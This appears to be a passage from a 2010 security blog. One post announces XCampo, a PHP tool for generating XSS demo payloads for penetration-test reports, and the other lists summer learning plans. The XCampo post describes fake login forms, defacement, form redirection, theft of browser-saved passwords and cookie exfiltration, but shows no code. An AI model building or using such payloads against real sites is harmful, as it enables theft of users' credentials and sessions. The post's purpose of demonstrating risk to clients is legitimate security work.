Tuesday 13 July 2010

XCampo

I'm very pleased to present you with a (more or less) usable version of XCampo!

What is XCampo? I decided to write this when I was coming back from the RootedCon conference in Madrid and it is intended to help me (and anyone who wants to use it) to generate better screenshots and demos for the report generation (and presentation) process.

Sometimes, when people generate security reports and they want to represent the risk of a XSS vulnerability they insert a simple script that shows an alert box with the name of the website or with text. This illustrates the possibility to execute anything we want and security people understand this....but do non technical people?

Using this PHP code you will get a nice page with some options to generate dynamically different payloads to your demos:
  • Fake login: Generates a fake login form page to force the user to insert his login details.
  • hax0r defacement: Try to generate an over-everything black layer with a text and an audio file.
  • Form redirection: Redirect any form in the website to a specified URL.
  • Password manager: Try to steal the login details stored in the browser when accessing to a specified webpage
  • Cookie stealing: Perform a cookie steal sending the details to the URL we want.
As you can see this provides a good range of options to generate more "dangerous" demos in the presentation of the results.

Friday 2 July 2010

Security challenges for the summer

Hello! The summer is here and the holidays are near!

Planning something to do? Too much free time as you don't have to do any exams in September? Looking for something to learn? Me too! :)

Each summer I plan something to learn, something to investigate... basically something to help me enjoy my free time! This summer I'm going to focus on:

  • Firefox addons development (Check this Hackbar Google Code website)
  • HTML5
I'll also try to keep my mind fit by playing online challenges games. If you want to practice and learn about security you can check the following websites:
Enjoy and keep out of direct sunlight ;)